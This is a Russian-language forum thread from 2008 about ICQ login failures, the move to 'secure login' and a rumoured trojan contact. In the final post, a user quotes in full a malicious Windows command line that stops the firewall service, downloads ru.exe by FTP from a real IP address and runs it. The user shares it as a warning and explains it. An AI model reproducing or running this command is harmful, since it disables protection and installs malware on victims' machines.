Главная | Регистрация | Пользователи | Календарь | Афиша | Сообщения за день | Всё прочитано | Поиск |
26.03.2008, 12:22 | # 223 |
живет на форуме
Статус: Offline
Польза: 0 |
Что может означать то,когда тебе приходит сообщение с незнакомого номера,хочешь посмотреть инфу о человеке,а аська выдает ошибку.
Пытаешься найти этого человека в поиске через номер icq,а аська в ответ говорит,что под таким номером никто не зарегистрирован 0_о Кто знает,что за нах? |
▪ Наверх |
28.05.2008, 18:26 | # 225 |
Endorsed By Kevin Keegan
Польза: +3 |
Ууу,видимо сиводня у всех так.
такая же херня...попробовал заново зарегится, ни фига не заходит. Потом, када подключаешь аську, поставил галочку "Безопасный вход". Зашло |
▪ Наверх | |
Отметили: Кобра Балета, cockney, Chuhmaster |
28.05.2008, 18:31 | # 227 |
живет на форуме
Польза: +1 |
PM99, ооо, спасибо!
А то мне пишет, что пароль неверный, думал номер стянули. Кому он нужен-то такой длинный? Поставил безопасный вход - отлично! |
▪ Наверх | |
Отметили: Кобра Балета |
29.05.2008, 22:10 | # 229 |
повелитель мыслей
Польза: 0 |
Цитата:
В Интернете паника, сайты асечных клиентов практически недоступны, включая официальный. У многих асек не подходит пароль. Что же случилось? В отличии от того бреда, которые пишут вполне серьёзные СМИ, дам этому более правильное объяснение. Перестал работать “простой” способ подключения, работает только “безопасный” способ. Это значит, что все клиенты, выпущенные до аськи 6, не будут подключаться к серверам. Ну и соответственно все неофициальные клиенты, которые логиняться, используя простой способ подключения. Только ради Бога, не меняйте вы сервер подключения на “slogin.oscar.aol.com”, это совершенно другой сервер и не предназначен он для подключения номеров аськи, он используется только для подключения aim аккаунтов. Просто включите безопасный вход в своём клиенте и не трогайте адрес сервера, он всегда был и есть “login.icq.com” или “login.oscar.aol.com”. Эти сервера понимают оба способа подключения и простой, и безопасный. В QIP Infium используется только безопасный вход и в нём проблем быть не должно с этим.
Мне кажется эта проблема вызвана случайно и думаю в скором времени “простой” способ подключения снова заработает. via INF.ru |
▪ Наверх |
29.05.2008, 22:13 | # 231 |
повелитель мыслей
у меня безопасный логин стоит и на мобиле и на компе. поэтмоу я даже ничего и не заметил.
|
▪ Наверх | |
Отметили: Генри Чинаски |
20.06.2008, 12:50 | # 232 |
Endorsed By Kevin Keegan
Вот такую хрень прислали...
"Со вчерашнего вечера во всех аськах появился троянчег или как его еще назвать под номером 12111 (имя ICQ System) который добавляет к паролю пару символов или его ворует. Из-за этого я лично сегодня не смог зайти в квип. В гугле только пишут что появился у всех - и действия разные... Перестрахуйтесь, он есть у 99% пользователей (появился сам) и находится в оффлайн-контактах... Снесите его и смените пароль если в аське найдешь в офлайне ник 12111 - удали его и смени пароль" добавлено через 37 секунд У себя нашел ((( |
▪ Наверх | |
Отметили: MARIO |
20.06.2008, 13:41 | # 240 |
живет на форуме
Польза: +2 |
пароль у меня поменялся... так что хуево( сменил и смог заходить к примеру на сайте в аську. пока не поменял не мог зайти ни с сайта ни с асек где автоматом не входил.
так как половину времени юзаю не виндоус, то уже как неделю наблюдал странную неведомаю ебаную хуйню, а именно, какой то скрип печатался в окошке для отправки сообщений. так как у меня не виндоус то он отображался. вот скрипт в два сообщения: %systemroot%\system32\cmd.exe cmd /c net stop SharedAccess &echo open 80.243.244.187 52323 >> ij &echo user t g >> ij &echo get ru.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &ru.exe &net start SharedAccess &exit наверно это он и есть. Он открывает консольку в виндусе, коннектится по фтп на сей адрес 80.243.244.187 по 52323 порту. Скачивает файлик экзешный, как раз трояновский. Так что советую вам поменять пароли и проверить заход на icq.com |
▪ Наверх | |
Отметили: Кобра Балета, psyjah |
|
|